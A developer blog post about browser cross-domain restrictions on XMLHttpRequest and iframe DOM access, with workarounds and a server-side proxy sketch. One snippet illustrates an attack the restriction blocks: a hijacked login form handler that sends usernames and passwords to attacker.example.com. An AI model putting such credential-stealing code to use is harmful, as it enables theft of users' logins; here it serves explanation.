If you are a web developer, you have probably run into situations where you need to access remote domains for data. For example, if you are building a weather mashup, you may want to connect to a weather forecasting service such as http://www.weather.gov or http://weather.cnn.com/weather/forecast.jsp. Most of these services are quite simple, so you can consume them from Javascript itself. (FYI, you can use the blog post I wrote some time back, Calling Simple Web Services From Javascript.) But browsers don’t make it that straightforward.
For example, if you try running the following code, which simply makes an AJAX call to an external domain,
// some external domain
var url = "http://test.dimuthu.org";

// doing the ajax call
var req = new XMLHttpRequest();
req.open("GET", url, true);
req.onreadystatechange = function(e) {
    if (req.readyState == 4) {
        if (req.status == 200) {
            alert(req.responseText);
        }
    }
};
req.send(null);
you will get a security exception from Firefox (Opera throws a similar exception):
uncaught exception: Access to restricted URI denied (NS_ERROR_DOM_BAD_URI)
To avoid this, you have to do some special work.
You need to add the following code before making any AJAX request to an external domain. It gives the script special privileges to access any domain through the XMLHttpRequest object:
try {
    netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
} catch (e) {
    alert("Permission UniversalBrowserRead denied.");
}
If your script always ends up in the exception branch, you have to configure your browser to allow this setting. You can do that from the “about:config” page in Firefox (just type “about:config” in the URL field and hit Enter), which shows a list of configuration entries; there you need to set the “signed.applets.codebase_principal_support” field to “true”. By default this field is set to false in Firefox 3.0.
After you have completed the above two steps, the page will show a warning message saying that the script is asking for more privileges, and the user has to click the “allow” button to continue.
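Putting the two pieces together, the whole cross-domain call could look roughly like the sketch below (it reuses the same example URL as in the first snippet, and assumes the about:config change above has been made):

// a sketch combining the privilege request with the cross-domain AJAX call
try {
    // ask for the privilege first (requires the about:config change above)
    netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");

    var req = new XMLHttpRequest();
    req.open("GET", "http://test.dimuthu.org", true);
    req.onreadystatechange = function () {
        if (req.readyState == 4 && req.status == 200) {
            alert(req.responseText);
        }
    };
    req.send(null);
} catch (e) {
    alert("Permission UniversalBrowserRead denied.");
}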
This procedure is not very difficult to set up, but it is still a real pain for an average user, so it is better to avoid it in your code as much as possible.
The main reason Firefox (and most other browsers) require this special setup is that attackers can run malicious scripts in a page you trust (for example, in one of your email messages) and send your private data to some other domain that you don’t know and don’t trust.
Apart from XMLHttpRequest, another popular way of accessing a different domain from a web page is to use framesets or iframes. Using this technique, you can show an external web page inside yours as if it were part of your own page.
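As a minimal sketch (the URL is just the example domain used earlier in this post, and the id and dimensions are made up for illustration), embedding an external page from Javascript could look like this:

// a minimal sketch: show an external page inside the current one
var frame = document.createElement("iframe");
frame.id = "externalFrame";              // assumed id, purely for illustration
frame.src = "http://test.dimuthu.org";   // external domain
frame.width = "600";
frame.height = "400";
document.body.appendChild(frame);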
Before Firefox 3.0 and IE 7.0, you were able to change that external page (its appearance or its content) to suit your needs when it was shown in a frame or iframe. This was possible by manipulating the DOM of that external page. With Firefox 3.0 and IE 7.0 it is no longer possible: you can still show an external page inside your web page, but you cannot change anything about it, because the browser does not allow you to access the DOM of that external page. This issue is discussed in detail at https://bugzilla.mozilla.org/show_bug.cgi?id=397828
With this change, you cannot access window.document if the page in that window comes from an external domain.
The reason for this limitation is apparent: if you think about modifying external pages shown inside your own page, you can see many security holes there. You could show a web-based email login page in an iframe and fool users. If that login page could not be changed by the containing page, it would not be a problem; but imagine it being changed to submit your username and password to the parent site by overriding the submit handler (the onclick attribute) in the DOM of that external page.
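To make that concrete, here is a hedged sketch of what such a malicious containing page would try to do, and why it fails. The iframe id, the form field names, and attacker.example.com are all invented for illustration:

// hypothetical attack that this restriction is designed to stop;
// assume the page contains <iframe id="mailLoginFrame" src="..."> pointing
// at a web mail login page on another domain
var frame = document.getElementById("mailLoginFrame");
try {
    // in Firefox 3.0 / IE 7.0 this cross-domain DOM access throws a
    // security exception, so none of the code below ever runs
    var doc = frame.contentWindow.document;
    var form = doc.forms[0];
    form.onsubmit = function () {
        // if the access were allowed, the credentials could be leaked to a
        // third-party server before the real form submission happens
        (new Image()).src = "http://attacker.example.com/steal" +
            "?u=" + encodeURIComponent(form.elements["username"].value) +
            "&p=" + encodeURIComponent(form.elements["password"].value);
        return true;
    };
} catch (e) {
    // this is the branch you actually end up in
    alert("Cross-domain DOM access denied: " + e);
}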
In fact, Firefox and most other browsers are trying to protect you from these attacks by restricting a lot of browser functionality. They do what they can on the client side, but you never know exactly what happens on the server side, since it is always a black box. All the restricted operations mentioned above (accessing remote services, showing and changing an external web page) can be done with very simple PHP or .NET code on the server side. So it is right that you should use the right tools, but it is more important that you are aware of these attacks and browse the web selectively while avoiding them.
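The post names PHP or .NET for that server-side piece; purely for consistency with the other examples here, the same idea can be sketched in JavaScript (Node.js) as a tiny same-domain proxy. The host name is just the example domain used earlier, and this is a sketch, not a hardened proxy:

// a minimal sketch of a same-domain proxy: the browser only ever talks to
// our own server, which fetches the external resource on its behalf
var http = require("http");

http.createServer(function (clientReq, clientRes) {
    // forward the incoming request path to the external service
    http.get({ host: "test.dimuthu.org", path: clientReq.url }, function (remoteRes) {
        var body = "";
        remoteRes.on("data", function (chunk) { body += chunk; });
        remoteRes.on("end", function () {
            clientRes.writeHead(remoteRes.statusCode, {
                "Content-Type": remoteRes.headers["content-type"] || "text/html"
            });
            clientRes.end(body);
        });
    }).on("error", function (err) {
        clientRes.writeHead(502);
        clientRes.end("Proxy error: " + err.message);
    });
}).listen(8080);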